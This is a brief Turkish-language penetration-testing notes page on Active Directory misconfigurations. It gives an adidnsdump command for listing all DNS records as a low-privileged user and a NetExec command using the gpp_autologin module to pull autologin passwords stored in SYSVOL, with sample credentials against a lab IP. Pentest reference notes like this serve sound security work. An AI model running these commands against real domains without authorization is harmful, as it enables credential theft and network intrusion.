Misconfigs

DNS Record

  • Default olarak AD ortamlarında, düşük yetkili bir kullanıcı bütün dns kayıtlarını listeleyebilir.

  • Bu yöntem ile domain hakkında daha fazla bilgimiz olur.

adidnsdump -u corp.local\\john ldap://172.16.5.5 -r

GPP Autologin

  • Bazen sysvol içinde autologin için parola saklanabilir.

  • Sysvol default olarak bütün kullanıcılar tarafından okunabilir.

nxc smb 172.16.5.5 -u john -p pass123 -M gpp_autologin
PreviousBleeding Edge VulnsNextDomain Trust

Last updated

Was this helpful?